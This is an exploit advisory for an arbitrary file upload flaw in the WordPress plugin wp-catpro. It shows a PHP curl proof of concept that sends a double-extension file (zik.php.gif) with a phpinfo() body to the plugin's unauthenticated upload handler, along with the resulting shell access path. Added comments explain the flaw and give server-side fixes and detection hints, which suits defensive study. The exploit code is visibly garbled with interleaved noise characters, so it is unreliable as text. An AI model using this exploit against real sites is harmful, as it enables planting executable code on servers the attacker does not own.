Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
<?php
// Advisory proof-of-concept as published. The text is interleaved with forum
// "noise" characters and is kept byte-for-byte below; read it as a description
// of the flaw rather than as runnable code.
//
// What the request tells a defender about the vulnerable handler (upload.php):
//  - the only guard quoted in the advisory is the extension whitelist
//    ("jpg", "gif", "png"). A double-extension name such as zik.php.gif passes
//    it because the name ends in an allowed extension. Whether the stored file
//    is then *executed* depends on the target's handler mapping — presumably a
//    server that matches handlers on any extension segment (e.g. Apache
//    multi-extension handling) is what the advisory was tested against;
//    confirm the mapping before treating a site as exposed.
" X2 a7 h. l/ d& y( x0 w, x 3 a0 ?$ y5 E+ R. ^- y
$uploadfile="zik.php.gif";8 j3 Z% _/ ?, y, L& S8 p
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
// Nothing below attaches a Cookie header or a WordPress nonce, so as exercised
// here the endpoint accepts the upload from an unauthenticated client.
// Server-side fix: require a capability check (current_user_can('upload_files'))
// and a nonce (check_ajax_referer()) before touching the file, and route the
// write through wp_handle_upload(), which validates the file type instead of
// merely checking that a whitelisted extension appears in the name.
8 @. K3 D* w: q) e% ocurl_setopt($ch, CURLOPT_POST, true);
8 Y+ S* o& p6 H$ ]! hcurl_setopt($ch, CURLOPT_POSTFIELDS,
// 'Filedata' uses curl's legacy "@file" upload marker; 'folder' is a
// client-supplied destination directory. A hardened handler must not take the
// destination from the request at all — use a fixed server-side path and a
// server-generated name carrying a single, validated extension.
! x/ ] g, I+ O h: A8 e* farray('Filedata'=>"@$uploadfile",/ x3 o0 ~: C: z0 ~
'folder'=>'/wp-content/uploads/catpro/'));$ [' ^5 X3 C. T+ a1 w9 J6 f0 V
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1 \8 E: i. u) o; \7 i$ r0 e4 o$postResult = curl_exec($ch);
/ I: X5 C6 O3 g% ~curl_close($ch);
/ V" s% o% A7 Y7 D/ L! K; V
// The response body is echoed; presumably it carries the randomised stored
// name referred to in the "Shell Access" line below — verify against the
// plugin source.
3 W1 s% P8 N& b( q& J8 N. cprint "$postResult";
# D7 ]) ?( S! ?1 `
// Detection / hardening notes for site owners: the stored file keeps its
// ".php." segment even after the base name is randomised, so any file under
// wp-content/uploads whose name contains ".php." is a strong indicator.
// Denying script execution inside wp-content/uploads at the web-server level
// neutralises this class of upload regardless of the plugin's own checks.
! u" V. ^1 L- TShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif" P8 h4 r8 s. T7 ]3 v+ P
?>& h0 m$ g5 W7 Q; z2 W
<?php: {; d7 Q! n; v6 W
// Body of the file the PoC uploads. phpinfo() is the advisory's evidence that
// the ".php.gif" file was run by the PHP engine rather than served as an
// image. For responders, a PHP open tag or a phpinfo() call inside a file
// under wp-content/uploads is itself a finding: it discloses the runtime
// configuration and shows that the upload directory executes scripts.
phpinfo();
2 Q' H' B! u4 |3 j: o+ G?> |